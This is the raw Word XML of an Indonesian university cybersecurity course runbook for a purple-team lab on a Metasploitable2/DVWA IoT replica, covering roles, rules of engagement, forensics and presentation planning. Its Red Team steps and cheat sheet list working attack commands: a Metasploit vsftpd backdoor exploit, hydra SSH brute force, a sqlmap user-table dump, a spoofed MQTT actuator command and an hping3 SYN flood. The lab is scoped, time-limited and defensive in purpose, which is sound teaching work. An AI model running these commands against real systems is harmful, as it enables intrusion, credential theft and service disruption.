          <w:color w:val="9B2226"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Aturan main: satu skenario tuntas dulu, lapor jam mulai/selesai ke Blue, baru lanjut. Semua output wajib disimpan sebagai teks, bukan hanya screenshot.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56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83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Skenario / langkah</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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Perintah inti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268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Siapkan folder bukti rt01–rt05 + cek tools.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mkdir -p docs/redteam/evidence/rt0{1..5}; which nmap msfconsole sqlmap hydra hping3 mosquitto_pub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screenshot which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R7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RT-01 recon: full TCP + service/OS fingerprint.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nmap -sS -p- -T4 --min-rate 1000 192.168.4.5 -oA rt01_fulltcp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rt01_fulltcp.nmap/.xml/.gnmap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R8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Kirim jam mulai/selesai serangan ke Blue (wajib).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 timestamp: date -Is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rt01_command.txt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R9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RT-02 eksploit vsftpd 2.3.4 (CVE-2011-2523).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msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS 192.168.4.5; run"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rt02_msf_console.txt + id = uid=0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RT-02 fallback bila backdoor sudah ditutup: default credential.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hydra -l msfadmin -P rockyou.txt ssh://192.168.4.5 -s 2222 -t 4 -f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rt02_hydra.txt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R11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RT-03 SQLi: login DVWA dulu, set security=low, ambil cookie sesi.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browser/curl → salin PHPSESSID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screenshot sesi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RT-03 eksekusi sqlmap.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sqlmap -u "http://192.168.4.5/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=...; security=low" --batch --dbs --dump -T users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rt03_sqlmap.txt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R13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RT-04 MQTT spoof publish (kondisional).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mosquitto_sub -h 192.168.4.5 -t "#" -v ; mosquitto_pub -h 192.168.4.5 -t aktuator/pompa -m '{"cmd":"ON"}'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rt04_pub.txt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RT-05 SYN flood terkontrol 60 detik.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sudo timeout 60 hping3 -S --flood -p 80 192.168.4.5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rt05_hping3.txt + curl latency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R15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Tahap 5: ulangi tiap skenario SETELAH mitigasi Blue.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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perintah sama, output disimpan dengan akhiran _after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rt0X_*_after.txt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Tulis catatan: berhasil/gagal, penyebab, kaitan kontrol checklist.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docs/redteam/evidence/rt0X/rt0X_notes.md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file notes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DECEC"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Batas yang tidak boleh dilanggar: (1) hanya 192.168.4.0/24, (2) DoS maksimal 60 detik satu service, (3) snapshot VM sebelum sesi, (4) tidak menyensor bukti sampai tidak terbaca — sensor hanya password/hash, (5) bila serangan tetap berhasil setelah mitigasi, tandai TERBUKA di log; itu temuan yang benar, bukan kegagalan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.5 Lead — selama Fase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80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66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3288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L7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Buka tiap sesi: cek snapshot, tulis jam mulai di logbook, ingatkan ROE.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baris logbook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L8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="56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 persetujuan Rules of Engagement sebelum Red menyerang (tanggal + jam).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="328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komentar/commit di attack_plan.md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L9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Jaga timebox: jika Blue belum menyelesaikan hardening, Red tidak boleh mulai.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L10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="56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Tutup tiap sesi dengan rapat 10 menit + isi tabel rekap purple team log.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="328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tabel rekap terisi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L11</w:t>
            </w:r>
          </w:p>
        </w:tc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Commit akhir sesi dengan pesan deskriptif; pastikan tidak ada kredensial ikut ter-commit.</w:t>
            </w:r>
          </w:p>
        </w:tc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git log + git diff --stat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L12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="566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11: susun kerangka Vulnerability Assessment Report sebelum mengisi detailnya.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="328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docs/reports/va-report.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Fase 3 — Forensik, Awareness &amp; Finalisasi (Minggu 12–15)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Fase 3 menilai kemampuan menjelaskan dan mempertanggungjawabkan, bukan menambah serangan baru. Semua isinya diambil dari artefak Fase 2 — karena itu kelengkapan bukti Fase 2 menentukan nilai Fase 3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Minggu 12 — Digital forensics &amp; Incident Report (NIST SP 800-61r2)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0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6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2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283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 / keluaran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B23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Pilih satu skenario yang paling kaya bukti (biasanya RT-02 atau RT-03) untuk dijadikan studi forensik.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pilihan + alasan singkat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B24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Kumpulkan artefak forensik: pcap, log Zeek (conn/http/dns), auth.log target, riwayat perintah, file yang berubah.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folder docs/reports/forensics/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B25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Susun timeline serangan (waktu, sumber, teknik, dampak) memakai timestamp dari Red.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tabel timeline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B26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Tulis Incident Report lengkap 4 fase NIST: Preparation; Detection &amp; Analysis; Containment, Eradication &amp; Recovery; Post-Incident Activity (lessons learned).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docs/reports/incident-report.md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R17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Serahkan log eksekusi + timestamp persis untuk tiap langkah serangan (bukan ringkasan).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file rt0X_command.txt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R18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Tuliskan penjelasan teknik dari sisi penyerang (mengapa langkah itu dipilih) untuk bagian analisis.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paragraf di incident report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L13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Review konsistensi: nomor CVE, IP, waktu, dan nama kontrol harus sama dengan checklist &amp; attack plan.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checklist review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Minggu 13 — IoT security awareness &amp; remediasi lanjutan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0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6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2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283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X1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Petakan temuan menjadi 5 rekomendasi yang bisa dipahami pengguna akhir (bukan istilah teknis).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materi awareness 1 halaman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B27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Terapkan minimal 3 remediasi tambahan pada replika (mis. TLS pada dashboard, rotasi kredensial, log terpusat).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diff config + bukti after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B28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Perbarui hardening checklist: status akhir tiap kontrol + catatan bila diganti kontrol lain.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checklist final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R19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Uji ulang 1 skenario sebagai bukti remediasi bekerja (regression test).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output _after kedua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L14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Pastikan README menjelaskan cara menjalankan ulang lab dari nol (untuk dosen/asisten).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README bagian "menjalankan ulang"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Minggu 14 — Gladi bersih &amp; video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0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6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2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283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L15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Susun rundown final (per menit), gladi minimal 2×, catat bagian yang melebihi waktu.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rundown + catatan waktu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L16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Rekam video demo (5–8 menit): lab hidup, Security Onion menangkap serangan, mitigasi, uji ulang gagal.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video tersimpan + link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B29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Siapkan skrip demo agar tidak bergantung internet: perintah sudah di file, log sudah diekspor.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skrip demo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R20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Siapkan skrip serangan yang aman didemokan live (pilih yang paling stabil, bukan yang paling rumit).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skrip demo red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X2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Peer review internal: tiap anggota menilai 1 bagian anggota lain, catat perbaikan.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catatan review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.4 Minggu 15 — Presentasi final &amp; demo live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0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6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329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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Bukti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L17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Verifikasi seluruh artefak sudah di GitHub sebelum sesi (slides.pdf, laporan, evidence, video).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screenshot repo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L18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Buka presentasi dengan ringkasan dampak bisnis (data operasional, perintah aktuator, ketersediaan) — bukan daftar tools.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slide pembuka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B30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Jelaskan siklus deteksi → analisis → mitigasi → verifikasi dengan satu contoh utuh (satu skenario).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slide + log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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="56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R21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5329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Jelaskan mengapa serangan itu relevan dengan tech stack replika, bukan serangan generik.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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slide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  <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="56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X3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="532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Siapkan jawaban untuk 5 pertanyaan yang paling mungkin muncul (lihat Bagian 7).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catatan Q&amp;A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Matriks Artefak, PIC, dan Waktu Commit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3515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Artefak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="136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type="dxa" w:w="2494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Batas waktu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268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Kriteria yang dilayani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docs/design/topology.png, ip_plan.md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 +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4 (selesai)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Arsitektur 20%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docs/presentation-minggu9/slides.pdf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sebelum sesi Minggu 9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 kriteria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docs/presentation-minggu9/tech_stack_declaration.md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 + Blue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9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Pemetaan tech stack 20%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docs/blueteam/hardening_checklist.md + evidence/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9 (rencana) → 10–11 (bukti)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Hardening 30%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docs/redteam/attack_plan.md + evidence/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9 (rencana) → 10–11 (bukti)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Attack plan 20%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docs/purple-team-log.md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 + Red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11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Purple Team Loop (VA Report)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Vulnerability Assessment Report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 + Blue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11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Nilai formal Fase 2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Incident Report (NIST SP 800-61r2)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12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Fase 3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Laporan akhir + video demo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Minggu 15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Presentasi final</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515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docs/logbook.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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diperbarui tiap minggu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268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Kerja sama 10%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Risiko yang Sudah Teridentifikasi &amp; Penanganannya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06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2494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Dampak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="408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Penanganan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Terkunci dari VM sendiri setelah mengubah port/firewall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Sesi habis, hardening gagal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Snapshot dulu; siapkan rule sebelum enable; jangan tutup sesi SSH lama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Repositori apt Metasploitable2 (Ubuntu 8.04) sudah EOL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ufw/fail2ban/mosquitto gagal dipasang</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="408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Pakai iptables + rate-limit; dokumentasikan penggantian kontrol secara jujur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Ganti password root MySQL mematikan DVWA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Skenario RT-03 tidak bisa dijalankan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Perbarui config/config.inc.php DVWA sebelum lanjut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MQTT broker tidak bisa dipasang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RT-04 tidak dapat dieksekusi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="408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Tandai kondisional; ganti dengan uji HTTP REST tanpa autentikasi, atau tambah VM Ubuntu kedua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RAM laptop tidak cukup untuk 3 VM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Sesi terbuang untuk troubleshooting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Jadwalkan Onion bergantian; matikan desktop environment; tambah RAM/SSD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 menyerang sebelum Blue selesai hardening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Bukti Tahap 1–5 tidak sinkron</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="408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Timebox + konfirmasi tertulis antar-role sebelum mulai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Repo privat / dosen tidak punya akses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Nilai presentasi 0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Undang dosen sebagai collaborator H-1, uji di mode incognito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Kredensial asli ikut ter-commit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Masalah etika &amp; keamanan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="408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Cek git diff sebelum commit; gunakan .env dan .gitignore</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. Definisi Selesai per Role &amp; Antisipasi Pertanyaan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247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839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Selesai bila …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Semua artefak ada di repo sebelum tenggat, repo bisa dibuka dosen, logbook terisi tiap minggu, tiap sesi punya catatan waktu &amp; keputusan.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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="839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Setiap kontrol yang diklaim "Selesai" punya bukti before + after; setiap skenario punya catatan deteksi (termasuk yang tidak terdeteksi); Incident Report lengkap 4 fase NIST.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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="839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Setiap skenario punya perintah, output teks, timestamp, dan hasil uji ulang setelah mitigasi; tidak ada bukti yang hanya berupa klaim lisan.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19"/>
        </w:rPr>
        <w:t>Lima pertanyaan yang paling mungkin muncul saat presentasi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">"Bedanya replika ini dengan sistem IoT asli kalian apa?" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ jawab dengan tabel Deklarasi Tech Stack: komponen, port, dan tiga batasan yang diakui (tanpa sensor fisik, tanpa TLS, MQTT ditambahkan).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">"Hardening-nya sudah jalan atau baru rencana?" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ sebut status apa adanya + tunjukkan file bukti yang ada; jangan mengklaim yang belum dieksekusi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">"Kenapa serangannya itu, bukan yang lain?" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ kaitkan ke celah nyata hasil riset Minggu 4 (vsftpd 2.3.4, MySQL root kosong, DVWA SQLi) dan ke dampak bisnis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">"Bagaimana kalian tahu mitigasinya berhasil?" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ tunjukkan Tahap 5: perintah yang sama diulang, gagal, alert tetap muncul, plus diff config.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">"Apa yang tidak kalian sempat kerjakan?" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ jawab dengan daftar terbuka dari purple-team-log (status TERBUKA/RENCANA) — ini menunjukkan kejujuran dan pemahaman.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. Lampiran — Cheat Sheet Perintah per Role</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.1 Blue Team (di VM target 192.168.4.5)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ssh -i ~/.ssh/pbl_kel4 -p 2222 msfadmin@192.168.4.5      # login setelah hardening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sudo netstat -tulpn | grep LISTEN                        # port terbuka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sudo iptables -L -n -v                                    # aturan firewall aktif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sudo grep "Failed password" /var/log/auth.log | tail     # percobaan login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sudo tcpdump -i eth0 -nn host 192.168.4.100 -w cap.pcap   # rekam trafik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sudo bash scripts/blueteam/01_rekam_baseline.sh           # bukti before</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.2 Red Team (di Kali 192.168.4.100)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nmap -sS -p- -T4 --min-rate 1000 192.168.4.5 -oA rt01      # recon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msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS 192.168.4.5; run"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sqlmap -u "http://192.168.4.5/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">       --cookie="PHPSESSID=&lt;sesi&gt;; security=low" --batch --dumps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hydra -l msfadmin -P rockyou.txt ssh://192.168.4.5 -s 2222 -t 4 -f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mosquitto_pub -h 192.168.4.5 -t aktuator/pompa -m '{"cmd":"ON"}'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sudo timeout 60 hping3 -S --flood -p 80 192.168.4.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.3 Lead (repo &amp; verifikasi)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git status &amp;&amp; git log --oneline -n 5                     # kondisi repo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git add -A &amp;&amp; git commit -m "docs: &lt;deskripsi&gt;"          # commit deskriptif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git push origin main                                     # unggah (butuh kredensial)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>git diff --cached --stat                                 # cek file yang akan masuk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="D5DED9"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5A6672"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Dokumen ini hidup: perbarui bila urutan kerja berubah, dan catat perubahan di logbook. Semua klaim teknis di dalamnya harus bisa ditunjukkan buktinya di repositori.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672"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Fase 1 → Fase 3  ·  versi 1.0  ·  halaman </w:t>
    </w:r>
    <w:fldSimple w:instr=" PAGE ">
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:color w:val="5A6672"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:fldSimple>
    <w:r>
      <w:rPr>
        <w:color w:val="5A6672"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> dari </w:t>
    </w:r>
    <w:fldSimple w:instr=" NUMPAGES ">
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:color w:val="5A6672"/>
        </w:rPr>
        <w:t>8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A6672"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>TEK1314 Keamanan Siber  ·  Kelompok 4  ·  Runbook PBL per Role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B6B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12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5A66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